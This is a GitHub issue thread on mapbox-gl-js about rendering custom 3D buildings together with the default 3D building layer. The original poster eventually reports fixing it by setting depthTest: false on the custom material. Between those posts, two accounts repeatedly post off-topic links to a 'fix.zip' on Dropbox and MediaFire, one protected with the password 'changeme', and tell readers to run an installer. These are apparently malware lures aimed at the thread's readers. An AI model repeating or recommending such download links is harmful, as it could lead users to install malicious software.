### ISSUE TITLE
How to make 3D custom building also visible in the scene, doing intersection between custom and default 3d Building

### ISSUE THREAD

**Issue by suryakumara** [mapbox/mapbox-gl-js#13260]
![image](https://github.com/user-attachments/assets/7b8e895b-eab4-4983-b431-8ff7f47130bc)
I can't find the answer on other issue. I'm here adding 3D Layer from default mapbox. How to make 3D custom building also visible in the scene, doing intersection between custom and default 3d Building
**mapbox-gl-js version 3.6.0:

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by suryakumara** [comment]
I fixed it by setting Material of Custom Building Property: adding the  depthTest: false,

**Comment by suryakumara** [comment]
I fixed it by setting Material of Custom Building Property: adding the depthTest: false,
